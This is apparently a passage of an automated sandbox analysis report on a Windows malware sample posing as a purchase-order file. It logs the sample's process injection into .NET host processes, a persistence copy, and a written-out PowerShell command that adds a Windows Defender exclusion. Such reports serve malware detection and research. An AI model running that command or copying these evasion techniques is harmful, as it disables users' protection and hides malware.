Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597842	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594386	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599225
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594591

Source: PO202502SNAKWS.exe, 00000006.00000002.1197633109.00000276337F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: PO202502SNAKWS.exe, 00000006.00000002.1200417218.00007FFD10465000.00000002.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200071018.00007FFD1020D000.00000002.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304240880.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303803132.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380141231.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379857549.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, msvcp290.dll.6.dr, msvcp290.dll.3.dr, libcares-2.dll.6.dr, libcares-2.dll.3.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: InstallUtil.exe, 0000001E.00000002.6519598023.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: svchost.exe, 0000000B.00000002.2866543451.0000021CA0E59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.2865890274.0000021C9B82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AddInProcess32.exe, 0000000A.00000002.6521861084.000000000147F000.00000004.00000020.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302465581.000001B37AD96000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6515623983.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378260320.0000015F25F18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 10_2_06B39668 LdrInitializeThunk,

10_2_06B39668

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe

Code function: 6_2_00007FF767D98700 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

6_2_00007FF767D98700

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FF767D91180 Sleep,Sleep,SetUnhandledExceptionFilter,	6_2_00007FF767D91180
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10205F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FFD10205F0C
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1045ED7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FFD1045ED7C
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FF6830A1180 Sleep,Sleep,SetUnhandledExceptionFilter,	22_2_00007FF6830A1180
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EED5F0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00007FFD0EED5F0C
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0F12ED7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00007FFD0F12ED7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 446000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 460000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F24008	Jump to behavior
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 446000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 460000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: E2C008
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8FA008

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: GetLocaleInfoEx,	6_2_00007FFD1013FEC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: GetLocaleInfoEx,	6_2_00007FFD10390FA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: GetLocaleInfoEx,	22_2_00007FFD0EE0FEC0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: GetLocaleInfoEx,	22_2_00007FFD0F060FA0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
